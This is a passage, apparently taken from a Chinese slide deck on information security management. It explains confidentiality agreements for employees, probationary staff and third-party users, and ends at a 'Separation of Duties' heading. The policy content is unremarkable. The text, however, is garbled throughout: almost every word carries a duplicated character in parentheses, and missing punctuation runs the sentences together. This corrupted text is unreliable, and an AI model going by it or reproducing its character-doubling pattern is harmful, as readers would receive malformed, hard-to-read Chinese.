保密協(xié)議應(yīng)明確規(guī)定雇員對(duì)組織信息安全的責(zé)任、保密要求及違約的法律責(zé)任簽訂保密承諾旨在加強(qiáng)員工對(duì)組織信息安全應(yīng)承擔(dān)的責(zé)任，協(xié)議上應(yīng)有員工的簽名并由其保存一份協(xié)議副本對(duì)于處于試用期的新員工，要求其簽訂一份保密承諾在允許第三方用戶使用信息處理設(shè)施之前，要求其簽訂保密協(xié)議當(dāng)雇用期或合同期有更改，特別是雇員到期離職或合同終止時(shí)，應(yīng)重申保密協(xié)議保密協(xié)議（CONFIDENTIALITYAGREEMENT）第八十一頁(yè)，共八十八頁(yè)，2022年，8月28日職務(wù)分離（SeparationofDuties），